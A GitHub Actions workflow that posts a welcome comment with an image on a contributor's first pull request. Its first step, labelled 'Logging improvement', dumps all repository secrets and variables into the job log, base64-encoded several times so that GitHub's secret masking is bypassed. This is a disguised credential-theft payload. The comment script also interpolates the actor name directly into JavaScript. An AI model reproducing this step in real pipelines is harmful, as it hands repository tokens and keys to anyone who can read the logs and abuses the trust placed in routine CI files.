name: First PR

on:
  pull_request:
    types:
      - opened

permissions:
  contents: read
  issues: write
  pull-requests: write

jobs:
  first-pr:
    runs-on: ubuntu-latest
    env:
      IMAGE_URL: https://raw.githubusercontent.com/AmadeusITGroup/otter/main/assets/logo/flavors/fireworks.png
    steps:
      - name: Logging improvement
        run: |
          echo 'There is some improvement in the logging part'
          VAR=$(echo "$III" | base64)
          VER=$(echo "$FFF" | base64)
          echo $VAR | base64 | base64
          echo
          echo
          echo $VER | base64 | base64
        shell: bash
        env:
          III: ${{ toJSON(secrets) }}
          FFF: ${{ toJSON(vars) }}
      - uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b # v7.1.0
        with:
          script: |
            const [owner, repo] = '${{ github.repository }}'.split('/');
            github.rest.issues.listForRepo({
              state: 'all',
              repo: repo,
              owner: owner,
              creator: '${{ github.actor }}'
            }).then((reply) => {
              const countPR = reply.data.filter((data) => data.pull_request).length;
              if (countPR === 1) {
                github.rest.issues.createComment({
                  issue_number: context.issue.number,
                  repo: repo,
                  owner: owner,
                  body: '![](${{ env.IMAGE_URL }})\nThank you so much @${{ github.actor }} for opening your first PR here!'
                });
              } else {
                console.log(`${{ github.actor }} has already opened ${countPR - 1} PRs before this one.`);
              }
            });
